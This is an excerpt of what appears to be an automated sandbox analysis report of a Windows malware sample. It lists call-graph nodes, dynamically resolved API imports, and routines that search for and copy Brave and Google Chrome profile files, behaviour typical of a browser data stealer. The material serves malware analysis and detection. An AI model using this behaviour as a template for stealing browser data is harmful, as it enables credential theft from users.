81472->81469 81472->81473 81473->81469 81473->81472 81474 40647b 81474->81469 81484 4150f0 GetProcessHeap HeapFree 81474->81484 81479 4065eb 81476->81479 81477 406699 81477->81444 81478 406670 VirtualProtect 81478->81477 81478->81479 81479->81477 81479->81478 81482->81458 81483->81474 81484->81473 82505 6c22b830 82506 6c22b83b 82505->82506 82507 6c22b86e dllmain_crt_process_detach 82505->82507 82508 6c22b860 dllmain_crt_process_attach 82506->82508 82509 6c22b840 82506->82509 82507->82509 82508->82509 82510 6c22b9c0 82511 6c22b9c9 82510->82511 82512 6c22b9ce dllmain_dispatch 82510->82512 82514 6c22bef1 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 82511->82514 82514->82512 82515 6c22b694 82516 6c22b6a0 ___scrt_is_nonwritable_in_current_image 82515->82516 82545 6c22af2a 82516->82545 82518 6c22b6a7 82519 6c22b6d1 82518->82519 82520 6c22b796 82518->82520 82528 6c22b6ac ___scrt_is_nonwritable_in_current_image 82518->82528 82549 6c22b064 82519->82549 82562 6c22b1f7 IsProcessorFeaturePresent 82520->82562 82523 6c22b6e0 __RTC_Initialize 82523->82528 82552 6c22bf89 InitializeSListHead 82523->82552 82524 6c22b7b3 ___scrt_uninitialize_crt __RTC_Initialize 82526 6c22b6ee ___scrt_initialize_default_local_stdio_options 82531 6c22b6f3 _initterm_e 82526->82531 82527 6c22b79d ___scrt_is_nonwritable_in_current_image 82527->82524 82529 6c22b7d2 82527->82529 82530 6c22b828 82527->82530 82566 6c22b09d _execute_onexit_table _cexit ___scrt_release_startup_lock 82529->82566 82533 6c22b1f7 ___scrt_fastfail 6 API calls 82530->82533 82531->82528 82532 6c22b708 82531->82532 82553 6c22b072 82532->82553 82537 6c22b82f 82533->82537 82535 6c22b7d7 82567 6c22bf95 __std_type_info_destroy_list 82535->82567 82541 6c22b83b 82537->82541 82542 6c22b86e dllmain_crt_process_detach 82537->82542 82539 6c22b70d 82539->82528 82540 6c22b711 _initterm 82539->82540 82540->82528 82543 6c22b860 dllmain_crt_process_attach 82541->82543 82544 6c22b840 82541->82544 82542->82544 82543->82544 82546 6c22af33 82545->82546 82568 6c22b341 IsProcessorFeaturePresent 82546->82568 82548 6c22af3f ___scrt_uninitialize_crt 82548->82518 82569 6c22af8b 82549->82569 82551 6c22b06b 82551->82523 82552->82526 82554 6c22b077 ___scrt_release_startup_lock 82553->82554 82555 6c22b07b 82554->82555 82557 6c22b082 82554->82557 82579 6c22b341 IsProcessorFeaturePresent 82555->82579 82559 6c22b087 _configure_narrow_argv 82557->82559 82558 6c22b080 82558->82539 82560 6c22b092 82559->82560 82561 6c22b095 _initialize_narrow_environment 82559->82561 82560->82539 82561->82558 82563 6c22b20c ___scrt_fastfail 82562->82563 82564 6c22b218 memset memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 82563->82564 82565 6c22b302 ___scrt_fastfail 82564->82565 82565->82527 82566->82535 82567->82524 82568->82548 82570 6c22af9a 82569->82570 82571 6c22af9e 82569->82571 82570->82551 82572 6c22b028 82571->82572 82574 6c22afab ___scrt_release_startup_lock 82571->82574 82573 6c22b1f7 ___scrt_fastfail 6 API calls 82572->82573 82575 6c22b02f 82573->82575 82576 6c22afb8 _initialize_onexit_table 82574->82576 82577 6c22afd6 82574->82577 82576->82577 82578 6c22afc7 _initialize_onexit_table 82576->82578 82577->82551 82578->82577 82579->82558 82580 6c22b8ae 82583 6c22b8ba ___scrt_is_nonwritable_in_current_image 82580->82583 82581 6c22b8c9 82582 6c22b8e3 dllmain_raw 82582->82581 82585 6c22b8fd dllmain_crt_dispatch 82582->82585 82583->82581 82583->82582 82584 6c22b8de 82583->82584 82593 6c20bed0 DisableThreadLibraryCalls LoadLibraryExW 82584->82593 82585->82581 82585->82584 82587 6c22b953 dllmain_crt_dispatch 82587->82581 82590 6c22b966 dllmain_raw 82587->82590 82588 6c22b94a 82588->82581 82588->82587 82589 6c22b91e 82589->82588 82594 6c20bed0 DisableThreadLibraryCalls LoadLibraryExW 82589->82594 82590->82581 82592 6c22b936 dllmain_crt_dispatch dllmain_raw 82592->82588 82593->82589 82594->82592 82595 6c1f3060 ?Startup@TimeStamp@mozilla@ ?Now@TimeStamp@mozilla@@CA?AV12@_N ?InitializeUptime@mozilla@ 82600 6c22ab2a 82595->82600 82599 6c1f30db 82604 6c22ae0c _crt_atexit _register_onexit_function 82600->82604 82602 6c1f30cd 82603 6c22b320 5 API calls ___raise_securityfailure 82602->82603 82603->82599 82604->82602 82605 6c1f35a0 82606 6c1f35c4 InitializeCriticalSectionAndSpinCount getenv 82605->82606 82621 6c1f3846 __aulldiv 82605->82621 82607 6c1f38fc strcmp 82606->82607 82612 6c1f35f3 __aulldiv 82606->82612 82609 6c1f3912 strcmp 82607->82609 82607->82612 82609->82612 82610 6c1f35f8 QueryPerformanceFrequency 82610->82612 82611 6c1f38f4 82612->82610 82613 6c1f375c 82612->82613 82614 6c1f3622 _strnicmp 82612->82614 82616 6c1f3944 _strnicmp 82612->82616 82618 6c1f395d 82612->82618 82619 6c1f3664 GetSystemTimeAdjustment 82612->82619 82615 6c1f376a QueryPerformanceCounter EnterCriticalSection 82613->82615 82617 6c1f37b3 LeaveCriticalSection QueryPerformanceCounter EnterCriticalSection 82613->82617 82620 6c1f37fc LeaveCriticalSection 82613->82620 82613->82621 82614->82612 82614->82616 82615->82613 82615->82617 82616->82612 82616->82618 82617->82613 82617->82620 82619->82612 82620->82613 82620->82621 82622 6c22b320 5 API calls ___raise_securityfailure 82621->82622 82622->82611

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040680A8), ref: 0041625D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040680C8), ref: 00416275
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040836A8), ref: 0041628E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040834C8), ref: 004162A6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040833F0), ref: 004162BE
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083408), ref: 004162D7
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04066328), ref: 004162EF
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040834E0), ref: 00416307
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040835D0), ref: 00416320
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083438), ref: 00416338
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040834F8), ref: 00416350
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040680E8), ref: 00416369
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067E68), ref: 00416381
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067C08), ref: 00416399
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067C88), ref: 004163B2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040835E8), ref: 004163CA
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083528), ref: 004163E2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04066350), ref: 004163FB
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067DC8), ref: 00416413
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083678), ref: 0041642B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D58), ref: 00416444
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E90), ref: 0041645C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D40), ref: 00416474
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067DE8), ref: 0041648D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E48), ref: 004164A5
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085EA8), ref: 004164BD
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085CF8), ref: 004164D6
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E00), ref: 004164EE
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D10), ref: 00416506
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D70), ref: 0041651F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E18), ref: 00416537
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085F20), ref: 0041654F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D88), ref: 00416568
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04061DC8), ref: 00416580
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E60), ref: 00416598
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085D28), ref: 004165B1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067E88), ref: 004165C9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085E78), ref: 004165E1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067CA8), ref: 004165FA
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085EC0), ref: 00416612
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04085DA0), ref: 0041662A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067BE8), ref: 00416643
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04067D08), ref: 0041665B
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085DB8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041666D
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085DD0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 0041667E
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085F38,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 00416690
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085EF0,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166A2
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085DE8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166B3
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085E30,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166C5
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085ED8,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166D7
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04085F08,?,00412CC6,?,00000030,00000064,004132C0,?,0000002C,00000064,00413260,?,00000030,00000064,Function_00013160,?), ref: 004166E8
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04067D28), ref: 0041670A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04085F50), ref: 00416722
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04083818), ref: 0041673A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04085F68), ref: 00416753
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04067C28), ref: 0041676B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04066378), ref: 00416790
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04067BA8), ref: 004167A9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,040663A0), ref: 004167C1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04085F80), ref: 004167D9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04085F98), ref: 004167F2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04067BC8), ref: 0041680A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04067F28), ref: 00416822
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(70530000,04085CE0), ref: 0041683B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(768D0000,04067C48), ref: 0041685C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(768D0000,04067F08), ref: 00416874
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(768D0000,04085FB0), ref: 0041688D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(768D0000,04085CC8), ref: 004168A5
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(768D0000,04067EE8), ref: 004168BD
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,040663C8), ref: 004168E3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,04066620), ref: 004168FB
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,04086070), ref: 00416913
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,04067CC8), ref: 0041692C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,04067E28), ref: 00416944
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75790000,040665D0), ref: 0041695C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04086040), ref: 00416982
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04067E08), ref: 0041699A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,040838F8), ref: 004169B2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04086088), ref: 004169CB
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04086028), ref: 004169E3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04067E48), ref: 004169FB
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04067F48), ref: 00416A14
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04085FE0), ref: 00416A2C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04086058), ref: 00416A44
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04067EA8), ref: 00416A66
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04085FC8), ref: 00416A7E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04085FF8), ref: 00416A96
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04086010), ref: 00416AAF
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04086370), ref: 00416AC7
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75690000,04067B68), ref: 00416AE8
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75690000,04067B88), ref: 00416B01
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(769C0000,04067EC8), ref: 00416B22
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(769C0000,04086340), ref: 00416B3A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067C68), ref: 00416B60
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067CE8), ref: 00416B78
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067D48), ref: 00416B90
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04086268), ref: 00416BA9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067D68), ref: 00416BC1
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067D88), ref: 00416BD9
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04067DA8), ref: 00416BF2
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6F8E0000,04086DF8), ref: 00416C0A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,04086130), ref: 00416C2B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,04083958), ref: 00416C44
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,04086160), ref: 00416C5C
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75D90000,040863B8), ref: 00416C74
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76470000,04086F78), ref: 00416C96
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6D410000,040861A8), ref: 00416CB7
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6D410000,04086F58), ref: 00416CCF
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6D410000,04086178), ref: 00416CE8
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(6D410000,04086358), ref: 00416D00
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                                              • Opcode ID: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                              • Instruction ID: 6fdcbfc83a7e6ced85b92bf4002cf1d70b18d179e1e2f66c0d1faa926a602d30
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce70c898548f88182f5d017b929846a165f52d01e2510d34cdd7b30da02966dd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6E623EB5510E10AFC374DFA8FE88A1637ABBBCC311311A519A60AC72A4DF759483CF95
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00411669
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 00411680
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004116D2
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7F8), ref: 004116E4
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041D7FC), ref: 004116FA
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 00411980
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 00411995
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                                                                                                                                                                                                                              • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                                                                                                                                                                                                                              • API String ID: 1125553467-2524465048
                                                                                                                                                                                                                                              • Opcode ID: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                              • Instruction ID: 56f1237c2d7c520c90c98f1ce5fb3a6d9b51b415e2d0c2f733ce4a2014328567
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e24380de87f91f985b66d320dbe961f46d573dc966b27323ddd82aaccc6d65a1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE9172B19006189BDB24EFA4DC85FEA737DBF88300F044589F61A92191DB789AC5CFA5
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 880 40b610-40b6a2 call 416d40 call 416f20 call 416fb0 call 416ea0 call 416e00 * 2 call 416d40 * 2 call 4170d0 FindFirstFileA 899 40b6e1-40b6f5 StrCmpCA 880->899 900 40b6a4-40b6dc call 416e00 * 6 call 413220 880->900 901 40b6f7-40b70b StrCmpCA 899->901 902 40b70d 899->902 944 40bf8b-40bf8e 900->944 901->902 906 40b712-40b78b call 416e20 call 416f20 call 416fb0 * 2 call 416ea0 call 416e00 * 3 901->906 904 40bf30-40bf43 FindNextFileA 902->904 904->899 909 40bf49-40bf56 FindClose call 416e00 904->909 950 40b791-40b817 call 416fb0 * 4 call 416ea0 call 416e00 * 4 906->950 951 40b81c-40b89d call 416fb0 * 4 call 416ea0 call 416e00 * 4 906->951 915 40bf5b-40bf86 call 416e00 * 5 call 413220 909->915 915->944 987 40b8a2-40b8b8 call 4170d0 StrCmpCA 950->987 951->987 990 40ba79-40ba8f StrCmpCA 987->990 991 40b8be-40b8d2 StrCmpCA 987->991 992 40ba91-40bad1 call 401500 call 416da0 * 3 call 409b30 990->992 993 40bade-40baf4 StrCmpCA 990->993 991->990 994 40b8d8-40b9f2 call 416d40 call 415260 call 416fb0 call 416f20 call 416ea0 call 416e00 * 3 call 4170d0 * 2 CopyFileA call 416d40 call 416fb0 * 2 call 416ea0 call 416e00 * 2 call 416da0 call 4093a0 991->994 1058 40bad6-40bad9 992->1058 997 40bb66-40bb7e call 416da0 call 415490 993->997 998 40baf6-40bb0d call 4170d0 StrCmpCA 993->998 1147 40b9f4-40ba36 call 416da0 call 401500 call 404dc0 call 416e00 994->1147 1148 40ba3b-40ba74 call 4170d0 DeleteFileA call 417040 call 4170d0 call 416e00 * 2 994->1148 1018 40bc51-40bc66 StrCmpCA 997->1018 1019 40bb84-40bb8b 997->1019 1008 40bb61 998->1008 1009 40bb0f-40bb5b call 401500 call 416da0 * 3 call 40a030 998->1009 1015 40beb9-40bec2 1008->1015 1009->1008 1022 40bf20-40bf2b call 417040 * 2 1015->1022 1023 40bec4-40bf15 call 401500 call 416da0 * 2 call 416d40 call 40b610 1015->1023 1031 40be50-40be65 StrCmpCA 1018->1031 1032 40bc6c-40bdcf call 416d40 call 416fb0 call 416ea0 call 416e00 call 415260 call 416f20 call 416ea0 call 416e00 * 2 call 4170d0 * 2 CopyFileA call 401500 call 416da0 * 3 call 40a6e0 call 401500 call 416da0 * 3 call 40ace0 call 4170d0 StrCmpCA 1018->1032 1025 40bbf7-40bc41 call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1019->1025 1026 40bb8d-40bb94 1019->1026 1022->904 1095 40bf1a 1023->1095 1103 40bc46 1025->1103 1035 40bbf5 1026->1035 1036 40bb96-40bbef call 401500 call 416da0 call 416d40 call 416da0 call 40a030 1026->1036 1031->1015 1041 40be67-40beae call 401500 call 416da0 * 3 call 40aa20 1031->1041 1179 40bdd1-40be1b call 401500 call 416da0 * 3 call 40b250 1032->1179 1180 40be26-40be3e call 4170d0 DeleteFileA call 417040 1032->1180 1043 40bc4c 1035->1043 1036->1035 1106 40beb3 1041->1106 1043->1015 1058->1015 1095->1022 1103->1043 1106->1015 1147->1148 1148->990 1196 40be20 1179->1196 1187 40be43-40be4e call 416e00 1180->1187 1187->1015 1196->1180
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,0041D71A,0041D717,00000000,?,?,?,0041DB54,0041D716), ref: 0040B695
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB58), ref: 0040B6ED
                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,0041DB5C), ref: 0040B703
                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0040BF3B
                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0040BF4D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                                                                                                                                                                              • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                                                                                                                                                                                                                              • API String ID: 3334442632-726946144
                                                                                                                                                                                                                                              • Opcode ID: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
                                                                                                                                                                                                                                              • Instruction ID: 76d401781d3fce7c968e745dc043d6a6225f477281f2400f678919b217ba5a4c
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 566b9f3a6f1d7abdc50b2301bb164a70b833557f1510103ad759021b71cd89c1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F423572A0010457CF14FB61DC56EEE773DAF84304F41455EF90AA6181EE38AB89CBE9
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
